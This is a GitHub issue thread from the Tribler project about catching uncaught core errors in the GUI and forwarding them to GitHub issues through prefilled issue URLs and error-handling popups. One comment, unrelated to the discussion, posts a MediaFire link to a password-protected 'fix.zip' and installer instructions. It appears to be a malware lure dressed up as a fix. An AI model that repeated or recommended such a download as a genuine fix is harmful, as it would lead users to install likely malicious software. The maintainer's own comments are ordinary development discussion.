### ISSUE TITLE
Forward errors to GitHub issues

### ISSUE THREAD

**Issue by qstokkink** [Tribler/tribler#8117]
When we have an uncaught core error, the core responds with an HTTP 500 message to the GUI. However, unless we look at the raw responses coming in (on the GUI side), we won't know of these errors.

We should let a user know that an error has occurred and allow them to forward these hidden stack traces to some error reporting facility (e.g., straight to GitHub issues).

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qstokkink** [comment]
It turns out that we can relatively easily forward errors to GitHub. For example:


https://github.com/Tribler/tribler/issues/new?body=Hello+World!%0AI+am+an+issue.

This link creates an issue filled with:

```
Hello World!
I am an issue
```

**Comment by qstokkink** [comment]
To catch the errors themselves, I think we'll have to wrap **all** the async `http` calls in `TriblerService` and `IPv8Service` in error handlers.

Getting the actual error out of the response seems like its own can of worms: https://stackoverflow.com/a/66234804

My thinking is that we can then `throw` any error that we caught again and then also initiate some sort of user popup that shows the error and the available options ("search", "report" or "ignore").

**Comment by qstokkink** [comment]
Alright, I think I'm confident enough to try and resolve this.

**Comment by qstokkink** [comment]
You can do some pretty fancy things with this TypeScript stuff:

![recording](https://github.com/user-attachments/assets/951026bc-9e67-4641-a8d6-4701e72331a4)
